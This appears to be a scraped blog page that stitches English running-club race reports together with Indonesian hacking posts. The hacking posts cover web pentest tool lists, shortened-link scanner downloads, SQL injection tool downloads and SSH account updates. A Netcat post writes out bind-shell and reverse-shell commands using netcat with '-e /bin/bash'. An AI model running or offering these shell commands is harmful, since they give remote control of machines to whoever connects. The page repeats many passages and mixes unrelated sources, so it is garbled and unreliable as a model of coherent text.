Sunday, 9 March 2014
2014 Chilly Half Marathon
13:48
For the second weekend in a row, we had athletes in action. For some it was a training race, for others it was a hammerfest. Here is how we did at the 2014 edition of the Chilly Half. Full Results.
First up, RunnerRob (left side of picture) had an awesome return from training in Kenya. He started out hard, going through 5K in 17minutes. He simply wasn't able to hang on to that pace, but still managed an awesome time of 1:18!
Doritos Dave had an outstanding race. We always expect him to race well...but not this well! He manged a HUGE PB of 1:22:14. This is especially impressive given the brutal winter, racing the weekend before, and the cold temps on race day. This very well could be a break-through year for Dave!
The Mailman also delivered on race day! A last minute sign-up, Aaron Mailman surprised himself with a new PB of 1:26:25.
Kevin Post, who has perfected his pre-race smile (see right), also had an awesome race. He managed a massive PB by almost 4.5 minutes!
Battling a shin injury, Holger put his high-mileage training to use, coming in at 1:28:46!
Despite just becoming a new Dad, and having very limited training, Will put together an awesome race, finishing just shy of his PB.
Graham Dunn also laced it up for H+P, putting in a great training run, finishing in just over 1:30!
First up, RunnerRob (left side of picture) had an awesome return from training in Kenya. He started out hard, going through 5K in 17minutes. He simply wasn't able to hang on to that pace, but still managed an awesome time of 1:18!
Doritos Dave had an outstanding race. We always expect him to race well...but not this well! He manged a HUGE PB of 1:22:14. This is especially impressive given the brutal winter, racing the weekend before, and the cold temps on race day. This very well could be a break-through year for Dave!
The Mailman also delivered on race day! A last minute sign-up, Aaron Mailman surprised himself with a new PB of 1:26:25.
Kevin Post, who has perfected his pre-race smile (see right), also had an awesome race. He managed a massive PB by almost 4.5 minutes!
Battling a shin injury, Holger put his high-mileage training to use, coming in at 1:28:46!
Despite just becoming a new Dad, and having very limited training, Will put together an awesome race, finishing just shy of his PB.
Graham Dunn also laced it up for H+P, putting in a great training run, finishing in just over 1:30!
Tuesday, 4 March 2014
Top 10 Web Application Penetration Testing Tools (actually 11)
23:39
1. Arachni
Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications.
Arachni is smart, it trains itself by learning from the HTTP responses it receives during the audit process.
Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling
through the paths of a web application’s cyclomatic complexity.
This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.
Unlike other scanners, Arachni takes into account the dynamic nature of web applications and can detect changes caused while travelling
through the paths of a web application’s cyclomatic complexity.
This way attack/input vectors that would otherwise be undetectable by non-humans are seamlessly handled by Arachni.
Finally, Arachni yields great performance due to its asynchronous HTTP model (courtesy of Typhoeus).
Thus, you’ll only be limited by the responsiveness of the server under audit and your available bandwidth.
Thus, you’ll only be limited by the responsiveness of the server under audit and your available bandwidth.
Note: Despite the fact that Arachni is mostly targeted towards web application security, it can easily be used for general purpose scraping, data-mining, etc with the addition of custom modules.
Sounds cool, right?
Features:
Helper audit methods:
For forms, links and cookies auditing.
A wide range of injection strings/input combinations.
Writing RFI, SQL injection, XSS etc modules is a matter of minutes if not seconds.
For forms, links and cookies auditing.
A wide range of injection strings/input combinations.
Writing RFI, SQL injection, XSS etc modules is a matter of minutes if not seconds.
Currently available modules:
Audit:
SQL injection
Blind SQL injection using rDiff analysis
Blind SQL injection using timing attacks
CSRF detection
Code injection (PHP, Ruby, Python, JSP, ASP.NET)
Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
LDAP injection
Path traversal
Response splitting
OS command injection (*nix, Windows)
Blind OS command injection using timing attacks (*nix, Windows)
Remote file inclusion
Unvalidated redirects
XPath injection
Path XSS
URI XSS
XSS
XSS in event attributes of HTML elements
XSS in HTML tags
XSS in HTML ‘script’ tags
Audit:
SQL injection
Blind SQL injection using rDiff analysis
Blind SQL injection using timing attacks
CSRF detection
Code injection (PHP, Ruby, Python, JSP, ASP.NET)
Blind code injection using timing attacks (PHP, Ruby, Python, JSP, ASP.NET)
LDAP injection
Path traversal
Response splitting
OS command injection (*nix, Windows)
Blind OS command injection using timing attacks (*nix, Windows)
Remote file inclusion
Unvalidated redirects
XPath injection
Path XSS
URI XSS
XSS
XSS in event attributes of HTML elements
XSS in HTML tags
XSS in HTML ‘script’ tags
Recon:
Allowed HTTP methods
Back-up files
Common directories
Common files
HTTP PUT
Insufficient Transport Layer Protection for password forms
WebDAV detection
HTTP TRACE detection
Credit Card number disclosure
CVS/SVN user disclosure
Private IP address disclosure
Common backdoors
.htaccess LIMIT misconfiguration
Interesting responses
HTML object grepper
E-mail address disclosure
US Social Security Number disclosure
Forceful directory listing<
Allowed HTTP methods
Back-up files
Common directories
Common files
HTTP PUT
Insufficient Transport Layer Protection for password forms
WebDAV detection
HTTP TRACE detection
Credit Card number disclosure
CVS/SVN user disclosure
Private IP address disclosure
Common backdoors
.htaccess LIMIT misconfiguration
Interesting responses
HTML object grepper
E-mail address disclosure
US Social Security Number disclosure
Forceful directory listing<
The Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing.
ZAP provides automated scanners as well as a set of tools that allow you to find security vulnerabilities manually.
Some of ZAP’s features:
Intercepting Proxy
Automated scanner
Passive scanner
Brute Force scanner
Spider
Fuzzer
Port scanner
Dynamic SSL certificates
API
Beanshell integration
Some of ZAP’s characteristics:
Easy to install (just requires java 1.6)
Ease of use a priority
Comprehensive help pages
Fully internationalized
Under active development
Open source
Free (no paid for ‘Pro’ version)
Cross platform
Involvement actively encouraged
DOWNLOAD
3. w3af
w3af is a Web Application Attack and Audit Framework. The project’s goal is to create a framework to find and exploit web application vulnerabilities that is easy to use and extend. To read our short and long term objectives, please click over the Project Objectives item in the main menu. This project is currently hosted at SourceForge , for further information, you may also want to visit w3af SourceForge project page .
The guys from backtrack (well it has connections with metasploit) included this awesome tool in their latest release.
This is only a small list of plugins that are available in w3af, you should really check out this tool.
Audit:
xsrf
htaccessMethods
sqli
sslCertificate
fileUpload
mxInjection
generic
localFileInclude
unSSL
xpath
osCommanding
remoteFileInclude
dav
ssi
eval
buffOverflow
xss
xst
blindSqli
formatString
preg_replace
globalRedirect
LDAPi
phishingVector
responseSplitting
DOWNLOAD
4. Vega
Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.
Vega includes an automated scanner for quick tests and an intercepting proxy for tactical inspection. Vega can be extended using a powerful API in the language of the web: Javascript.
Vega was developed by Subgraph in Montreal.
Modules
Cross Site Scripting (XSS)
SQL Injection
Directory Traversal
URL Injection
Error Detection
File Uploads
Sensitive Data Discovery
Core:
Automated Crawler and Vulnerability Scanner
Consistent UI
Website Crawler
Intercepting Proxy
SSL MITM
Content Analysis
Extensibility through a Powerful Javascript Module API
Customizable alerts
Database and Shared Data Model
DOWNLOAD
5. Acunetix
You heard about this program so many times. Is it good? Well you can download the free edition and test it.
Acunetix WVS automatically checks your web applications for SQL Injection, XSS & other web vulnerabilities.
HTTP Editor – Construct HTTP/HTTPS requests and analyze the web server response.
HTTP Sniffer – Intercept, log and modify all HTTP/HTTPS traffic and reveal all data sent by a web application.
HTTP Fuzzer – Perform sophisticated fuzzing tests to test web applications input validation and handling of
unexpected and invalid random data. Test thousands of input parameters with the easy to use rule builder of
the HTTP Fuzzer. Tests that would have taken days to perform manually can now be done in minutes.
Script your own custom web vulnerability attacks with the WVS Scripting tool. A scripting SDK documentation
is available from the Acunetix website.
Blind SQL Injector – An automated database data extraction tool that is ideal for penetration testers who wish to make further tests manually
DOWNLOAD
6. Skipfish
Skipfish is an active web application security reconnaissance tool. It prepares an interactive sitemap for the targeted site by carrying out a recursive crawl and dictionary-based probes. The resulting map is then annotated with the output from a number of active (but hopefully non-disruptive) security checks. The final report generated by the tool is meant to serve as a foundation for professional web application security assessments.
High risk flaws (potentially leading to system compromise):
Server-side SQL / PHP injection (including blind vectors, numerical parameters).
Explicit SQL-like syntax in GET or POST parameters.
Server-side shell command injection (including blind vectors).
Server-side XML / XPath injection (including blind vectors).
Format string vulnerabilities.
Integer overflow vulnerabilities.
Locations accepting HTTP PUT.
Medium risk flaws (potentially leading to data compromise):
Stored and reflected XSS vectors in document body (minimal JS XSS support present).
Stored and reflected XSS vectors via HTTP redirects.
Stored and reflected XSS vectors via HTTP header splitting.
Directory traversal / file inclusion (including constrained vectors).
Assorted file POIs (server-side sources, configs, etc).
Attacker-supplied script and CSS inclusion vectors (stored and reflected).
External untrusted script and CSS inclusion vectors.
Mixed content problems on script and CSS resources (optional).
Password forms submitting from or to non-SSL pages (optional).
Incorrect or missing MIME types on renderables.
Generic MIME types on renderables.
Incorrect or missing charsets on renderables.
Conflicting MIME / charset info on renderables.
Bad caching directives on cookie setting responses.
DOWNLOAD
7. Websecurify
Websecurify is an integrated web security testing environment, which can be used to identify web vulnerabilities by using advanced browser automation, discovery and fuzzing technologies. The platform is designed to perform automated as well as manual vulnerability tests and it is constantly improved and fine-tuned by a team of world class web application security penetration testers and the feedback from an active open source community.
The built-in vulnerability scanner and analyzation engine are capable of automatically detecting many types of web application vulnerabilities as you proceed with the penetration test. The list of automatically detected vulnerabilities include:
SQL Injection
Local and Remote File Include
Cross-site Scripting
Cross-site Request Forgery
Information Disclosure Problems
Session Security Problems
many others including all categories in the OWASP TOP 10
DOWNLOAD
8. Burp
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.
Burp Suite contains the following key components:
An intercepting proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware spider, for crawling content and functionality.
An advanced web application scanner, for automating the detection of numerous types of vulnerability.
An intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A repeater tool, for manipulating and resending individual requests.
A sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.
DOWNLOAD
9. Netsparker
Netsparker will try lots of different things to confirm identified issues. If it can’t confirm it and if it requires manual inspection, it’ll inform you about a potential issue generally prefixed as [Possible], but if it’s confirmed, that’s it. It’s a vulnerability. You can trust it.
Netsparker confirms vulnerabilities by exploiting them in a safe manner. If a vulnerability is successfully exploited it can’t be a false-positive. Exploitation is carried out in a non-destructive way.
SQL Injection
XSS (Cross-site Scripting)
XSS (Cross-site Scripting) via Remote File Injection
XSS (Cross-site Scripting) in URLs
Local File Inclusions & Arbitrary File Reading
Remote File Inclusions
Remote Code Injection / Evaluation
OS Level Command Injection
CRLF / HTTP Header Injection / Response Splitting
Find Backup Files
Crossdomain.xml Analysis
Finds and Analyse Potential Issues in Robots.txt
Finds and Analyse Google Sitemap Files
Detect TRACE / TRACK Method Support
Detect ASP.NET Debugging
Detect ASP.NET Trace
Checks for CVS, GIT and SVN Information and Source Code Disclosure Issues
Finds PHPInfo() pages and PHPInfo() disclosure in other pages
Finds Apache Server-Status and Apache Server-Info pages
Find Hidden Resources
Basic Authentication over HTTP
Password Transmitted over HTTP
Password Form Served over HTTP
Source Code Disclosure
Auto Complete Enabled
ASP.NET ViewState Analysis
ViewState is not Signed
ViewState is not Encrypted
E-mail Address Disclosure
Internal IP Disclosure
Cookies are not marked as Secure
Cookies are not marked as HTTPOnly
Directory Listing
Stack Trace Disclosure
Version Disclosure
Access Denied Resources
Internal Path Disclosure
Programming Error Messages
Database Error Messages
DOWNLOAD
10. WebSurgery
WebSurgery is a suite of tools for security testing of web applications. It was designed for security auditors to help them with the web application planning and exploitation. Currently, it uses an efficient, fast and stable Web Crawler, File/Dir Bruteforcer and Fuzzer for advanced exploitation of known and unusual vulnerabilities such as SQL Injections, Cross site scripting (XSS), brute-force for login forms, identification of firewall-filtered rules etc.
DOWNLOAD
Semoga bermanfaat..
https://www.facebook.com/1mp4ct404
Product All Tool security Scanner
23:18
Ok kali ini saya akan membagikan semua produk scanner.. langsung saja di simak
IP Sonar http://cur.lv/7yp35
MegaPing Scanner http://cur.lv/7ypbt
N-Stealth security Scanner http://cur.lv/7ypby
Nikto2 http://cur.lv/7ypej
nCircle IP360 Vulnerability Management http://cur.lv/7ypct
Netvigilance http://cur.lv/7ypd7
Network Analizyng http://cur.lv/7ypde
Network Scanning Software http://cur.lv/7ypdl
NGS Software http://cur.lv/7ypdt
Ns Auditor http://cur.lv/7ypev
NTO Spider http://cur.lv/7ypfa
Okidan's Pearl Paradise http://cur.lv/7ypfq
Patch Quest ScanFi http://cur.lv/7ypg3
PC Mantra http://cur.lv/7ypgb
PowerFuzzer http://cur.lv/7ypgn
Rapid7 http://cur.lv/7ypgv
Retina Network Security Scanner http://cur.lv/7yph3
Vulnrability Scanner http://cur.lv/7yphh
Spectator Scanning Tool http://cur.lv/7yphs
SQL Server 2000 http://cur.lv/7yphx
SQL Map http://cur.lv/7ypi8
Syhunt http://cur.lv/7ypii
Security Audit http://cur.lv/7ypin
Vulnrability Scanning Cluster Project http://cur.lv/7ypir
Wapiti http://cur.lv/7ypiw
App Scan http://cur.lv/7ypjg
Webcruiser http://cur.lv/7ypji
WeSecurity http://cur.lv/7ypjs
What My IP http://cur.lv/7ypjx
Wikto Asessement Tool http://cur.lv/7ypk3
Wmap http://cur.lv/7ypke
Network Security http://cur.lv/7ypkk
MaxPatrol security Scanner http://cur.lv/7ypbl
Joomla Vulnrability Scanner http://cur.lv/7ypa5
Infiltration System http://cur.lv/7yp9c
Nessus http://cur.lv/7yp3m
Nmap http://cur.lv/7yp3v
Acinetix http://cur.lv/7yp3z
Advanced IP Scanner http://cur.lv/7yp45
Angry IP Scanner http://cur.lv/7yp4m
App Detective http://cur.lv/7yp4p
Arirang http://cur.lv/7yp51
Attact Tool Kit Project http://cur.lv/7yp5f
Auto Scan http://cur.lv/7yp5u
Beyond Security http://cur.lv/7yp67
Card Recon http://cur.lv/7yp6f
Critical Watch http://cur.lv/7yp6j
Cum Security Toolkit http://cur.lv/7yp6y
CXL Ltd http://cur.lv/7yp78
DOM XSS Scanenr http://cur.lv/7yp7l
Domino Dig http://cur.lv/7yp7o
Filterrules http://cur.lv/7yp7t
GFI LAN Guard http://cur.lv/7yp8a
Gherkin http://cur.lv/7yp8c
Halberd http://cur.lv/7yp8h
Http Recon Project http://cur.lv/7yp8p
Immunity Canvas http://cur.lv/7yp8w
Inguama http://cur.lv/7yp9q
IP Audit http://cur.lv/7yp9z
ISS http://cur.lv/7ypa3
Mavituna Security Ltd http://cur.lv/7ypax
Semoga Bermanfaat
IP Sonar http://cur.lv/7yp35
MegaPing Scanner http://cur.lv/7ypbt
N-Stealth security Scanner http://cur.lv/7ypby
Nikto2 http://cur.lv/7ypej
nCircle IP360 Vulnerability Management http://cur.lv/7ypct
Netvigilance http://cur.lv/7ypd7
Network Analizyng http://cur.lv/7ypde
Network Scanning Software http://cur.lv/7ypdl
NGS Software http://cur.lv/7ypdt
Ns Auditor http://cur.lv/7ypev
NTO Spider http://cur.lv/7ypfa
Okidan's Pearl Paradise http://cur.lv/7ypfq
Patch Quest ScanFi http://cur.lv/7ypg3
PC Mantra http://cur.lv/7ypgb
PowerFuzzer http://cur.lv/7ypgn
Rapid7 http://cur.lv/7ypgv
Retina Network Security Scanner http://cur.lv/7yph3
Vulnrability Scanner http://cur.lv/7yphh
Spectator Scanning Tool http://cur.lv/7yphs
SQL Server 2000 http://cur.lv/7yphx
SQL Map http://cur.lv/7ypi8
Syhunt http://cur.lv/7ypii
Security Audit http://cur.lv/7ypin
Vulnrability Scanning Cluster Project http://cur.lv/7ypir
Wapiti http://cur.lv/7ypiw
App Scan http://cur.lv/7ypjg
Webcruiser http://cur.lv/7ypji
WeSecurity http://cur.lv/7ypjs
What My IP http://cur.lv/7ypjx
Wikto Asessement Tool http://cur.lv/7ypk3
Wmap http://cur.lv/7ypke
Network Security http://cur.lv/7ypkk
MaxPatrol security Scanner http://cur.lv/7ypbl
Joomla Vulnrability Scanner http://cur.lv/7ypa5
Infiltration System http://cur.lv/7yp9c
Nessus http://cur.lv/7yp3m
Nmap http://cur.lv/7yp3v
Acinetix http://cur.lv/7yp3z
Advanced IP Scanner http://cur.lv/7yp45
Angry IP Scanner http://cur.lv/7yp4m
App Detective http://cur.lv/7yp4p
Arirang http://cur.lv/7yp51
Attact Tool Kit Project http://cur.lv/7yp5f
Auto Scan http://cur.lv/7yp5u
Beyond Security http://cur.lv/7yp67
Card Recon http://cur.lv/7yp6f
Critical Watch http://cur.lv/7yp6j
Cum Security Toolkit http://cur.lv/7yp6y
CXL Ltd http://cur.lv/7yp78
DOM XSS Scanenr http://cur.lv/7yp7l
Domino Dig http://cur.lv/7yp7o
Filterrules http://cur.lv/7yp7t
GFI LAN Guard http://cur.lv/7yp8a
Gherkin http://cur.lv/7yp8c
Halberd http://cur.lv/7yp8h
Http Recon Project http://cur.lv/7yp8p
Immunity Canvas http://cur.lv/7yp8w
Inguama http://cur.lv/7yp9q
IP Audit http://cur.lv/7yp9z
ISS http://cur.lv/7ypa3
Mavituna Security Ltd http://cur.lv/7ypax
Semoga Bermanfaat
Tool SQL Injection Terbaik
22:03
Saya mau bagi2 Tool yang sering saya gunakan untuk sql injection scanner selain sqlmap dan havij
Ok bro lngsung hajar aj..link download ada di bawah
1.Pangolin Injection Scanner
Download Pangolin
2. The Mole
Download The Mole
3. SQL Ninja
Download SQL Ninja
4. Safe3SI
Download Safe3SI
5. BSQL Hacker
Download BSQL Hacker
6. FatCat Automatic SQL Injection
Download FatCat
7. SQL Poizon
Download SQL Poizon
8. SQlsus
Download Sqlsus
9. Dark Jumper
Download Dark Jumper
10. Schemafuz
1. Download 1
2. Download 2
Terimakasih semoga bermanfaat
Ok bro lngsung hajar aj..link download ada di bawah
1.Pangolin Injection Scanner
Download Pangolin
2. The Mole
Download The Mole
3. SQL Ninja
Download SQL Ninja
4. Safe3SI
Download Safe3SI
5. BSQL Hacker
Download BSQL Hacker
6. FatCat Automatic SQL Injection
Download FatCat
7. SQL Poizon
Download SQL Poizon
8. SQlsus
Download Sqlsus
9. Dark Jumper
Download Dark Jumper
10. Schemafuz
1. Download 1
2. Download 2
Terimakasih semoga bermanfaat
Monday, 3 March 2014
Download NetCat For Windows
21:26
Netcat adalah utilitas jaringan sederhana yang membaca dan menulis data melalui koneksi jaringan menggunakan protokol TCP / IP. Ini adalah alat yang bagus untuk debugging segala macam masalah jaringan. Hal ini memungkinkan Anda untuk membaca dan menulis data melalui socket jaringan hanya sesederhana Anda dapat membaca data dari stdin atau menulis ke stdout. Saya telah mengumpulkan beberapa contoh dari apa ini dapat digunakan untuk menyelesaikan.
Membangun koneksi dan mendapatkan beberapa data melalui HTTP:
# Nc example.com 80
GET / HTTP/1.0
<HTML>
<-! Kode situs di sini ->
</ HTML>
Membuat shell:
1. Mesin remote:
nc-l 1234-e / bin / bash
2. Mesin lokal:
nc remote_machine 1234
Membuat reverse shell:
1. Mesin lokal:
nc-l 1234
2. Mesin remote:
nc-e / bin / bash LOCAL_MACHINE 1234
Itu sebagian dari Netcat
Untuk downloadnya ada di bawah
DOWNLOAD NETCAT
Semoga bermanfaat
Membangun koneksi dan mendapatkan beberapa data melalui HTTP:
# Nc example.com 80
GET / HTTP/1.0
<HTML>
<-! Kode situs di sini ->
</ HTML>
Membuat shell:
1. Mesin remote:
nc-l 1234-e / bin / bash
2. Mesin lokal:
nc remote_machine 1234
Membuat reverse shell:
1. Mesin lokal:
nc-l 1234
2. Mesin remote:
nc-e / bin / bash LOCAL_MACHINE 1234
Itu sebagian dari Netcat
Untuk downloadnya ada di bawah
DOWNLOAD NETCAT
Semoga bermanfaat
Sunday, 2 March 2014
SSH Update 3 Maret 2014
09:22
Langsung sedot aja...
Semua ada disini
OpenSSH Port 22,80,109,143
Dropbear port 443
Dropbear port 443
Semoga Bermanfaat
Friday, 28 February 2014
2014 Re-Fridgee-8er
20:06
The 2014 H+P race season has officially begun! We had a great time kicking things off at this years' edition of the Re-Fridgee-8er.
Before we get started, a huge thanks goes out to Julie Schmidt of the Waterloo Running Series for the photography!
There were a number of impressive performances and surprises for the team. Here is how we did:
Ahmed Ahmed had an awesome H+P debut, placing 2nd overall, 1st among all males, and averaging 3:46/K
Luke Ehgoetz crushed the course, coming in just behind Ahmed for 3rd overall, and winning the masters title!
Aaron Mailman had a breakthrough performance, coming in over 2 minutes faster than last year, winning hisAG and placing 5th OA!
Nick Burt, like Ahmed, also impressed in his H+P debut. He not only placed 7th OA, but also won his AG!
Gillian Willard was next in line from the team. She had a huge PB, placing her 2nd overall for females (only beat by elite Canadian Marathoner Krista Duchene), and winning her AG!
Emily Hunter had a breakthrough performance, coming in about 5 minutes faster than anticipated, and placed 2nd in her AG!
Dragan Ball-Z continues to improve, crushing his goal of breaking 5mins/K, as he placed 4th in his AG.
Dave "the ageless wonder" Rutherford destroyed the course. He placed 2nd on the team, was the first masters athlete, and placed 7th OA!
Brendan showed lots of heart- a 2x winner of this event, he knew coming in that he was not even close to as fit as he has been in the past. He also puked during the race. Despite that, he never gave up, fought to the bitter end, and placed 3rd on the team and winning his AG.
Coach Dyce also showed heart as he struggled with a significant illness the week leading up to the race. Despite the lack of training and not being 100% on race day, he still beat his time from last year, cracked the top 10 OA, and placed 2nd in his AG!
Mike Piazza was next on the team. He really impressed, doing everything he could to chase down Dave. He took well over 2 minutes off his PB, and placed 3rd in his AG.
Graham Dunn, for some reason, decided that he should run something like 20K on top of what he was racing. No matter- he still came in with a time of 32minutes, placing him second out of all masters athletes.
Payton also came in with an awesome time just behind Vicki, and placed first in a very competitive AG!

Candice and Ed both had awesome performances in their respective races despite missing training throughout the months leading up to the race. They both still cracked the top 10 in the AGs, way to go!
And last but not least, Mark "can't commute to practice from Hamilton" Potvin, had a great race for the team- great to have you with us again Mark!
Before we get started, a huge thanks goes out to Julie Schmidt of the Waterloo Running Series for the photography!
There were a number of impressive performances and surprises for the team. Here is how we did:
Team Results:
In the team categories (8M and 8K open teams) we managed to place 1st overall! True, there were not very many other teams..but our goal was to have a quick average pace for our top 5 runners..and we did just that:
In the 8K, our top 5 athletes averaged under 30 minutes, an average pace of about 3:43mins/K.
In the 8M, our top 5 athletes averaged just over 51 minutes, which is about 4:00mins/K.
A huge pat on the back goes out to Dave Rutherford, who surprised everybody when he placed 2nd on the 8K team- not bad for 50 years old! Also, a massive congrats goes out to coach Gill who, out of the 10 athletes who scored points for the teams, was the only female to do so!
Individuals Results:
Ahmed Ahmed had an awesome H+P debut, placing 2nd overall, 1st among all males, and averaging 3:46/K
Aaron Mailman had a breakthrough performance, coming in over 2 minutes faster than last year, winning his
Nick Burt, like Ahmed, also impressed in his H+P debut. He not only placed 7th OA, but also won his AG!
Gillian Willard was next in line from the team. She had a huge PB, placing her 2nd overall for females (only beat by elite Canadian Marathoner Krista Duchene), and winning her AG!
Emily Hunter had a breakthrough performance, coming in about 5 minutes faster than anticipated, and placed 2nd in her AG!
Dragan Ball-Z continues to improve, crushing his goal of breaking 5mins/K, as he placed 4th in his AG.Heidi also had a great race, beating her time from last year and winning her category!
Brendan showed lots of heart- a 2x winner of this event, he knew coming in that he was not even close to as fit as he has been in the past. He also puked during the race. Despite that, he never gave up, fought to the bitter end, and placed 3rd on the team and winning his AG.
Coach Dyce also showed heart as he struggled with a significant illness the week leading up to the race. Despite the lack of training and not being 100% on race day, he still beat his time from last year, cracked the top 10 OA, and placed 2nd in his AG!
Mike Piazza was next on the team. He really impressed, doing everything he could to chase down Dave. He took well over 2 minutes off his PB, and placed 3rd in his AG.
Graham Dunn, for some reason, decided that he should run something like 20K on top of what he was racing. No matter- he still came in with a time of 32minutes, placing him second out of all masters athletes. 
Candice and Ed both had awesome performances in their respective races despite missing training throughout the months leading up to the race. They both still cracked the top 10 in the AGs, way to go!
And last but not least, Mark "can't commute to practice from Hamilton" Potvin, had a great race for the team- great to have you with us again Mark!Onward to another great year of racing! Up next for the team: The Chilly Half and Around the Bay!
Subscribe to:
Posts (Atom)






